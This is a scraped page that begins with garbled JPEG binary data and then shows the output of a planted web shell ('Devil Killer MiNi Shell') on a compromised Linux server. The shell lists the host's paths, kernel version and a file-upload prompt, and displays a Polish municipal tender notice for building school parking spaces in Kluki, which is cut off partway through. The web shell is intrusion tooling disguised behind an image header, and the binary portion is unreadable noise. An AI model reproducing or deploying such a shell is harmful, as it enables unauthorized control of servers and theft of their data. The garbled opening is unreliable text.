JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250711/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250711/0032173601-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Budowa stanowisk postojowych wraz z drogą dojazdową przy Zespole Szkolno-Przedszkolnym w Klukach </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA KLUKI</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 590648043</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">88</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kluki</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">97-415</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL713 - Piotrkowski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@kluki.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.kluki.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Budowa stanowisk postojowych wraz z drogą dojazdową przy Zespole Szkolno-Przedszkolnym w Klukach </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-a5211340-bc8a-4f56-8d66-62d195eb6400</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00321736</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-07-11</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00044502/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.3 Budowa stanowisk postojowych wraz z drogą dojazdową przy Zespole Szkolno-Przedszkolnym w Klukach</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-a5211340-bc8a-4f56-8d66-62d195eb6400 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W niniejszym postępowaniu o udzielenie zamówienia komunikacja odbywa się między Zamawiającym a Wykonawcami przy użyciu Platformy e-Zamówienia, która dostępna jest pod adresem https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Komunikacja pomiędzy Zamawiającym a Wykonawcami odbywa się przy użyciu Platformy e-Zamówienia,zwanej Platformą,dostępnej pod adresem:https://ezamowienia.gov.pl.Korzystanie z Platformy jest<br/>bezpłatne.Wykonawca zamierzający wziąć udział w postęp. o udzielenie zamów.publicz. musi posiadać konto podmiotu&#34;Wykonawca&#34;na Platformie.Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy określa Regulamin Platformy,dostępny na stronie inter. https://ezamowienia.gov.pl/pl/regulamin/#regulaminserwisu<br/>oraz informacje zamieszczone w zakładce&#34;Centrum pomocy.&#34;Przeglądanie i pobieranie publicznej treści dok. postęp. nie<br/>wymaga posiadania konta na Platformie ani logowania.Sposób sporządzenia dok. elektr. lub dok. elektr. będących kopią elektroniczną treści zapisanej w postaci papierowej(cyfrowe odwzorowania)musi być zgodny z wymaganiami określonymi w rozporz.Prezesa Rady Ministrów z dnia30.12.2020r.w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań<br/>technicz. dla dok. elektr. oraz środków komunikacji elektr. w postęp. o udziel. zamów. publicz. lub konkursie(Dz.U.z 2020r.,poz.2452).Dok. elektr.,o których mowa w§2ust.1 ww.Rozporz.,w tym m.in.oferty,oświadczenia,o których mowa w art.125ust.1,podmiotowe środki dowodowe,w tym oświadczenie,o którym mowa w art.117ust.4ustawyPzp oraz zobowiązanie podmiotu udostępniaj. zasoby,o którym mowa w art.118ust.3ustawyPzp,przedmiotowe środki dowodowe,pełnomocnictwo,sporządza się w postaci elektr.,w formatach danych określonych w przepisach wydanych na podst. art.18ustawy z dnia 17.02.2005r.o informatyzacji działalności podmiotów realizujących zadania publiczne(t.j.Dz.U.z2024r.,poz.307 )tj.Rozporz.Rady Ministrów w<br/>sprawie Krajowych Ram Interoperac.,min. wymagań dla rejestrów publicz. i wymiany informacji w postaci elektr. oraz min. wymagań<br/>dla systemów teleinformat.(t.j.Dz.U.z2017r.,poz.2247),z uwzględnieniem rodzaju przekazywanych danych i przekazuje się jako<br/>załączniki.Informacje,oświadczenia lub dokumenty,inne niż wymienione w§2ust.1 rozporz.Prezesa Rady Ministrów w sprawie<br/>wymagań dla dok.elektr.,przekazywane w postępowaniu sporządza się w postaci elektr.:w formatach danych określonych w<br/>przepisach rozporz.Rady Ministrów w sprawie Krajowych Ram Interoper.(i przekazuje się jako załącznik),lub jako tekst wpisany<br/>bezpośrednio do wiadomości przekazywanej przy użyciu środków komunikacji elektr.(np.w treści wiadomości e-mail lub w<br/>treści&#34;Formularza do komunikacji.&#34;Jeżeli dokumenty elektr.,przekazywane przy użyciu środków komunikacji elektr.,zawierają<br/>informacje stanowiące tajemnicę przedsiębiorstwa w rozumieniu przepisów ustawy z dnia 16.04.1993r.o zwalczaniu nieuczciwej<br/>konkurencji(t.j.Dz.U.z2022r.,poz.1233),Wykonawca,w celu utrzymania w poufności tych informacji,przekazuje je w wydzielonym i<br/>odpowiednio oznaczonym pliku,wraz z jednoczesnym zaznaczeniem w nazwie pliku&#34;Dokument stanowiący tajemnicę<br/>przedsiębiorstwa&#34;.Komunikacja w postępowaniu,z wyłączeniem składania ofert,odbywa się drogą elektr.za pośrednictwem<br/>formularzy do komunikacji dostępnych w zakładce&#34;Formularze&#34;(&#34;Formularze do komunikacji&#34;).Za pośrednictwem&#34;Formularzy do<br/>komunikacji&#34;odbywa się w szczególności przekazywanie wezwań i zawiadomień,zadawanie pytań i udzielanie odp.Formularze do<br/>komunikacji umożliwiają dołączenie załącznika do przesyłanej wiadomości (&#34;dodaj załącznik&#34;).Możliwość korzystania w postępow.<br/>z&#34;Formularzy do komunikacji&#34;w pełnym zakresie wymaga posiadania konta&#34;Wykonawcy&#34;na Platformie oraz zalogowania się na<br/>Platformie.Do korzystania z&#34;Formularzy do komunikacji&#34;służących do zadawania pytań dot. treści dok. zamów.,wystarczające jest<br/>posiadanie tzw.konta uproszcz. na Platformie.Wszystkie wysłane i odebrane w postępow. przez Wykonawcę wiadomości widoczne<br/>są po zalogowaniu w podglądzie postępowania w zakładce&#34;Komunikacja&#34;.Maks. rozmiar plików wynosi 150MB(dotyczy plików<br/>przesyłanych jako załączniki do jednego formularza).Pozostałe zapisy umieszczone są w rozdz.XIISWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Wypełniając obowiązek prawny uregulowany zapisami art. 13 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych <br/>w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urząd. Unii Europ. z dnia 04.05.2016 r. L 119/1) (dalej jako „RODO”), informujemy, że:<br/>1.	Administratorem danych osobowych przetwarzanych w Urzędzie Gminy w Klukach jest Wójt Gminy Kluki (dalej jako „Administrator”). Dane kontaktowe Administratora:<br/>a)	adres: Kluki 88, 97-415 Kluki<br/>b)	telefon: 44 631 50 02<br/>c)	e-mail: sekretariat@kluki.pl<br/>2.	Kontakt z Inspektorem Ochrony Danych możliwy jest za pomocą poczty elektronicznej: iod@kluki.pl lub pisemnie na adres Administratora.<br/>3.	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c w celu prowadzenia przedmiotowego postępowania o udzielenie zamówienia publicznego oraz zawarcia umowy, a podstawą prawną ich przetwarzania jest obowiązek prawny stosowania sformalizowanych procedur udzielania zamówień publicznych spoczywających na Zamawiającym.<br/>4.	Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy z dnia 11 września 2019r. – Prawo zamówień publicznych, dalej „ustawa Pzp” , związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego. Konsekwencją niepodania danych osobowych może być brak możliwości udzielenia zamówienie publicznego. W szczególności niepodanie stosownych danych osobowych może skutkować odrzuceniem oferty wykonawcy.<br/>5.	Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy Pzp. Administrator udostępni Państwa dane osobowe również podmiotom przetwarzającym oraz świadczącym na rzecz Administratora usługi w zakresie utrzymania systemów informatycznych, poczty elektronicznej i tradycyjnej oraz bankowości elektronicznej.<br/>6.	Podanie danych osobowych jest obowiązkowe, a ich niepodanie lub podanie niepełnych danych osobowych może utrudnić lub uniemożliwić realizację celu.<br/>7.	Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 Pzp przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy. W przypadku zawarcia i realizacji umowy obejmuje również okres niezbędny do zabezpieczenia ewentualnych roszczeń wynikających z umowy, chyba, że przepisy szczegółowe stanowią inaczej.<br/>8.	Osobie, której dane są przetwarzane przysługuje prawo do:<br/>a) dostępu do danych osobowych na podstawie art. 15 RODO,<br/>b) sprostowania danych osobowych na podstawie art. 16 RODO. Skorzystanie z prawa do sprostowania danych nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Prawo zamówień publicznych,<br/>c) ograniczenia przetwarzania danych osobowych na podstawie art. 18 RODO. Prawo do ograniczenia przetwarzania danych osobowych nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego,<br/>d) wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy przetwarzanie danych osobowych narusza przepisy RODO.<br/>Osobie, której dane są przetwarzane nie przysługuje prawo do: <br/>a) usunięcia danych osobowych w związku z art. 17 ust. 3 lit. b, d lub e RODO,<br/>b) przenoszenia danych osobowych, o którym mowa w art. 20 RODO,<br/>c) sprzeciwu wobec przetwarzania danych osobowych, gdyż podstawą przetwarzania danych osobowych jest art. 6 ust. lit c RODO</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">c.d. RODO<br/>9.	W trakcie przetwarzania danych osobowych nie dochodzi do wyłącznie zautomatyzowanego podejmowania decyzji ani do profilowania, o których mowa w art. 22 ust. 1 i 4 RODO. Oznacza to, że żadne decyzje dotyczące osób, których dane dotyczą nie będą zapadać wyłącznie automatycznie oraz nie stosuje się ich profilowania. Administrator nie będzie przekazywać danych osobowych do państwa trzeciego lub organizacji międzynarodowej.<br/>10.	Wykonawca ubiegając się o udzielenie zamówienia publicznego jest zobowiązany do wypełnienia wszystkich obowiązków formalno-prawnych związanych z udziałem w postępowaniu. Do obowiązków tych należą m.in. obowiązki wynikające z RODO, w szczególności obowiązek informacyjny przewidziany w art. 13 RODO względem osób fizycznych, których dane osobowe dotyczą i od których dane te wykonawca bezpośrednio pozyskał. Jednakże obowiązek informacyjny wynikający z art. 13 RODO nie będzie miał zastosowania, gdy i w zakresie, w jakim osoba fizyczna, której dane dotyczą, dysponuje już tymi informacjami (vide: art. 13 ust. 4). <br/>Ponadto wykonawca będzie musiał wypełnić obowiązek informacyjny wynikający z art. 14 RODO względem osób fizycznych, których dane przekazuje zamawiającemu i których dane pośrednio pozyskał, chyba że ma zastosowanie co najmniej jedno z wyłączeń, o których mowa w art. 14 ust. 5 RODO. W celu zapewnienia, że wykonawca wypełnił ww. obowiązki informacyjne oraz ochrony prawnie uzasadnionych interesów osoby trzeciej, której dane zostały przekazane w związku <br/>z udziałem wykonawcy w postępowaniu, Zamawiający zobowiązuje wykonawcę do złożenia <br/>w postępowaniu o udzielenie zamówienia publicznego oświadczenia o wypełnieniu przez niego obowiązków informacyjnych przewidzianych w art. 13 lub art. 14 RODO.<br/>11.	Wzór oświadczenia wymaganego od wykonawcy w zakresie wypełnienia przez niego obowiązków informacyjnych przewidzianych w art. 13 lub art. 14 RODO został uwzględniony we wzorze formularza ofertowego (załącznik nr 1 do SWZ). <br/>12.	Do spraw nieuregulowanych w SWZ mają zastosowanie przepisy ustawy z 11 września 2019 r. – Prawo zamówień publicznych oraz przepisy RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RIZ.271.3.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest budowa stanowisk postojowych wraz z drogą dojazdową i chodnikami (dojściami) w Klukach na działkach o numerach ewid. 687/2 i 683 wraz <br/>z odwodnieniem częściowo do kanalizacji deszczowej. Przedmiotowe działki stanowią teren przyległy do Zespołu Szkolno-Przedszkolnego.<br/>1)	Zakres robót do wykonania obejmuje budowę: <br/>- miejsc postojowych dla samochodów osobowych o nawierzchni z geokraty w ilości 60 stanowisk, w tym dwa stanowiska postojowe przeznaczone dla uprawnionej osoby niepełnosprawnej <br/>z kostki brukowej (stanowiska będą wydzielone pasem z kostki grafitowej szerokości 0,5 m),<br/>- miejsca postojowego dla autobusu o nawierzchni z kostki brukowej,<br/>- drogi dojazdowej (manewrowej) o nawierzchni z kostki brukowej,<br/>- lokalnych dość (chodników) o nawierzchni z kostki brukowej.<br/>Droga dojazdowa (jezdnia manewrowa) będzie mieć szerokość 4,50-5,00 m. Projektuje się miejsca dla samochodów osobowych prostopadłe a dla autobusu - równoległe. Szerokość miejsc postojowych wynosi 2,5 m, a dla osób niepełnosprawnych 3,6 m. Miejsca parkingowe projektowane są jako ogólnodostępne – przeznaczone wyłącznie dla samochodów osobowych, z wyłączeniem stanowiska dla autobusu. Przy miejscach postojowych projektuje się krawężniki typu najazdowego 15x22. Chodniki obramować obrzeżem betonowym 8x30.<br/>2)	W zakres przedmiotu umowy wchodzi również:<br/>- regulacja istniejącego zjazdu z ul. Szkolnej służącego jako zjazd na parking,<br/>- przestawienie hydrantu ppoż. kolidującego z inwestycją,<br/>- rozebranie części ogrodzenia szkoły,<br/>- wykonanie 3 wpustów deszczowych ze studzienkami betonowymi DN 500 z 2 przyłączami DN200-250 kanalizacji deszczowej,<br/>- wykonanie humusowania z obsiewem trawą.<br/>2. Nie wyklucza się istnienia w terenie innych, nie wykazanych na mapie urządzeń podziemnych, które nie były zgłoszone do inwentaryzacji lub o których brak jest informacji w instytucjach branżowych. W przypadku wystąpienia kolizji z istniejącym uzbrojeniem należy zawiadomić zarządcę sieci i projektanta. <br/>3. Szczegółowy opis przedmiotu zamówienia zawarty jest w dokumentacji projektowej, stanowiącej Załącznik nr 4 do SWZ:<br/>1)	Projekt budowlany,<br/>2)	Projekt architektoniczno – budowlany,<br/>3)	Projekt zagospodarowania terenu,<br/>4)	Projekt techniczny, <br/>5)	Specyfikacja techniczna wykonania i odbioru robót (dalej jako: „STWiOR”),<br/>6)	Przedmiar robót, <br/>7)	Projekt stałej organizacji ruchu.<br/>8)	Decyzja o warunkach zabudowy<br/>9)	Opinia geotechniczna<br/>10)	Uzgodnienia projektowe<br/>11)	Uzgodnienia ppoż.<br/>12)	Decyzja Nr 504.2025 z dn. 30.06.2025 r. zatwierdzająca projekt zagospodarowania terenu oraz projekt architektoniczno-budowlany i udzielająca pozwolenia na budowę.<br/>Powyższe dokumenty stanowią załączniki do SWZ. Dołączony do SWZ przedmiar robót ma charakter poglądowy i ułatwiający Wykonawcy identyfikację robót budowlanych. Dla ustalenia prawidłowej ilości i rodzaju robót na potrzeby sporządzenia oferty, Zamawiający sugeruje przeprowadzenie analizy pozostałych składników dokumentacji projektowej, a także analizy Specyfikacji Technicznej Wykonania i Odbioru Robót Budowlanych.<br/>Przedmiot zamówienia należy wykonać zgodnie z opisem przedmiotu zamówienia, dokumentacją projektową oraz Projektowanymi Postanowieniami Umowy, stanowiącymi Załączniki do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233200-1 - Roboty w zakresie różnych nawierzchni</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45000000-7 - Roboty budowlane</p> <p class="mb-0">45111300-1 - Roboty rozbiórkowe</p> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45233226-9 - Roboty budowlane w zakresie dróg dojazdowych</p> <p class="mb-0">45330000-9 - Roboty instalacyjne wodno-kanalizacyjne i sanitarne</p> <p class="mb-0">45231300-8 - Roboty budowlane w zakresie budowy wodociągów i rurociągów do odprowadzania ścieków</p> <p class="mb-0">45232000-2 - Roboty pomocnicze w zakresie rurociągów i kabli</p> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45233222-1 - Roboty budowlane w zakresie układania chodników i asfaltowania</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">120 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.Zamawiający przy wyborze ofert będzie kierował się kryteriami określonymi poniżej.2.Zamawiający<br/>udzieli zamówienia Wykonawcy,którego oferta zostanie oceniona jako najkorzystniejsza tzn.uzyska najwyższą liczbę pkt. w łącznej<br/>ocenie ofert.Oferta w łącznej ocenie oferty może uzyskać maks.100pkt.3.Ocenie będą podlegać wyłącznie oferty nie podlegające odrzuceniu.4.Zamawiający zastosuje zaokrąglanie wyników oceny do dwóch miejsc po przecinku.W sytuacji,gdy Zamawiający nie będzie mógł dokonać wyboru najkorzystniejszej oferty ze względu na to,że zostały złożone oferty o takiej samej ilości przyznanych punktów,wezwie Wykonawców,którzy złożyli te oferty,do złożenia w terminie określonym przez Zamawiającego ofert dodatkowych zawierających nową cenę.Wykonawcy, składając oferty dodatkowe, nie mogą zaoferować cen wyższych niż zaoferowane w<br/>uprzednio złożonych przez nich ofertach.5.W toku badania i oceny ofert Zamawiający może żądać od Wykonawców wyjaśnień<br/>dotyczących treści złożonych przez nich ofert lub innych składanych dokumentów lub oświadczeń.Wykonawcy są zobowiązani do<br/>przedstawienia wyjaśnień w terminie wskazanym przez Zamawiającego.6.Zamawiający wybiera najkorzystniejszą ofertę w terminie związania ofertą określonym wSWZ.7.Jeżeli termin związania ofertą upłynie przed wyborem najkorzystniejszej oferty,Zamawiający wezwie Wykonawcę,którego oferta otrzymała najwyższą ocenę,do wyrażenia,w wyznaczonym przez Zamawiającego terminie,pisemnej zgody na wybór jego oferty.8.W przypadku braku zgody,o której mowa w ust.7,oferta podlega odrzuceniu,a Zamawiający zwraca się o wyrażenie takiej zgody do kolejnego Wykonawcy,którego oferta została najwyżej oceniona,chyba,że zachodzą przesłanki do unieważnienia postępowania.9.Jeżeli złożono ofertę,której wybór prowadziłby do powstania u Zamawiającego obowiązku podatk.zgodnie z przepisami o podatku od towarów i usług,to w celu oceny oferty dolicza się podatek od towarów i usług,który miałby obowiązek rozliczyć zgodnie z tymi przepisami.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane 